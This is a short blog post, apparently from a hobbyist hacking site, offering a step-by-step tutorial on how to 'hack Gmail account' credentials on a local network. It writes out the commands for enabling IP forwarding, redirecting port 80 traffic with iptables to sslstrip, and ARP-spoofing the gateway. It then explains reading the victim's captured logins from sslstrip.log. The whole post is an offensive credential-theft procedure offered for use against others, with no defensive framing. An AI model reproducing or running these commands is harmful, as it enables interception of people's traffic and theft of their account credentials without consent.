Many of my friends always asked me how to hack Gmail account, so i decided that my next post will be on Gmail hacking . To hack a Gmail account you will require Backtrack machine or any other Linux Distribution.
Note:- My this post will work only in a Local Area Network. I also assume that you will work on any Linux distro (Backtrack will be a plus point because you don't need to download all the tools) .
Let's Start
If you are working on Backtrack, no need to download any tool. But for any other Linux Users first download sslstrip by clicking here.
Now follow these steps:-
1. Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
2. Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
In the above Fig you see i first check my default gateway IP address by running netstat -nr command and then flip my machine into forwarding mode and set iptables (firewall rules to redirect traffic from port 80 to port 10000) .
3. Run sslstrip.
python sslstrip.py -l <listenPort>
4. Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> <gatewayIP>
Now when victim opens Gmail on his computer All the log in credentials will be Stored on sslstrip.log file. To open log file just enter into this directory /pentest/web/sslstrip. Then open log file using this command vi sslstrip.log
If you have any query then please comment your questions .
No comments:
Post a Comment